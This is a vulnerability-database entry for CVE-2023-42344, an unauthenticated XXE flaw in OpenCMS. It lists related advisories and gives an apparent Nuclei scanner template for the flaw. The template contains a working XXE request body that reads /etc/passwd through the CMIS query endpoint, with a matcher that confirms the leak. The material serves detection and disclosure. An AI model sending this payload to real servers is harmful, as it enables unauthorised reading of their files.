| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2023-42344 | 8 May 202600:00 | – | attackerkb | |
| The vulnerability of the OpenCMS content management system lies in the improper limitation of XML links to external objects, which allows attackers to execute arbitrary code by sending a specially crafted POST request. | 23 Nov 202300:00 | – | bdu_fstec | |
| CVE-2023-42344 | 22 Nov 202310:37 | – | circl | |
| Alkacon OpenCMS 代码问题漏洞 | 8 May 202600:00 | – | cnnvd | |
| CVE-2023-42344 | 8 May 202600:00 | – | cve | |
| CVE-2023-42344 | 8 May 202600:00 | – | cvelist | |
| EUVD-2023-46797 | 8 May 202606:32 | – | euvd | |
| Alkacon OpenCms allows remote unauthenticated attackers to obtain sensitive information | 8 May 202606:32 | – | github | |
| CVE-2023-42344 | 8 May 202605:16 | – | nvd | |
| GHSA-RCC6-6Q2F-M2CW Alkacon OpenCms allows remote unauthenticated attackers to obtain sensitive information | 8 May 202606:32 | – | osv |
id: CVE-2023-42344
info:
name: OpenCMS - XML external entity (XXE)
author: 0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
impact: |
Unauthenticated attackers can exploit XXE vulnerabilities to execute malicious requests on the OpenCMS server, potentially reading sensitive server files and internal data.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
classification:
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: alkacon
product: opencms
fofa-query: "OpenCms-9.5.3"
tags: cve,cve2023,xxe,opencms,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 490a00463044022003729b42a3346990074b01265bb571c43e164a846fd1b88cfaeaeda0041466c3022010818590f159a5a7d570b3d5d6a7db35123605a5c93eea40d35467e4237fd387:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation